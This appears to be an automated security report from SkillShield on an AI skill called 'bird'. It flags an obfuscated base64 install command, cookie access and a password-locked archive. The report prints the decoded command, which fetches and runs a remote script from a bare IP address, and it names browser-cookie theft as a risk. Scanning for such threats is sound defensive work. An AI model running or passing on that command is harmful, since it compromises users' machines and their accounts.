Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Arbitrary Code Execution via Obfuscated `curl | bash` from Untrusted IP, Skill designed to access sensitive browser cookies.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-nc/SKILL.md:10 | |
| CRITICAL | Arbitrary Code Execution via Obfuscated `curl | bash` from Untrusted IP The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from a suspicious, non-domain IP address (`91.92.242.30`) directly into the user's shell. This allows for complete compromise of the user's system, including data exfiltration, installation of malware, or further command injection. The use of base64 encoding is a clear attempt to obfuscate the malicious intent, combining command injection, supply chain risk, and hidden instructions. Remove the suspicious MacOS installation command. Provide a secure, verifiable installation method, preferably through a package manager or a signed installer from a trusted domain. Ensure all dependencies are from trusted sources and their integrity can be verified. | LLM | SKILL.md:9 | |
| HIGH | Skill designed to access sensitive browser cookies The skill description states that `bird` uses "Browser cookies (default: Firefox/Chrome)" for authentication. While this is a legitimate mechanism for some tools, in the context of a skill whose installation method involves arbitrary code execution from an untrusted source, this capability poses a high risk. A compromised `bird` tool could access and exfiltrate sensitive authentication cookies from the user's browsers (Firefox/Chrome), leading to account takeovers and data breaches. If the `bird` tool is intended to be used, ensure its source code is thoroughly audited for malicious behavior, especially regarding cookie access and handling. Implement strict sandboxing or permission controls to limit its access to sensitive user data. Consider alternative, more secure authentication methods that do not require direct access to browser cookie stores. | LLM | SKILL.md:28 | |
| MEDIUM | Password-protected archive for Windows installation The Windows installation instructs the user to download a ZIP archive (`OpenClawProvider-1.0.2.zip`) and provides a password (`openclaw`) for extraction. Requiring a password for a publicly distributed software package is unusual and can be used to hinder automated security analysis or manual inspection of the archive's contents, potentially concealing malicious payloads. This introduces an unnecessary layer of obscurity and raises suspicion about the integrity of the package. Distribute software packages without passwords. If encryption is necessary for specific reasons, use standard, transparent methods and provide clear documentation for verification. Ensure the integrity of the downloaded package can be verified (e.g., via checksums or digital signatures). | LLM | SKILL.md:5 |
Scan History
Embed Code
[](https://skillshield.io/report/1313418b6d1b693e)
Powered by SkillShield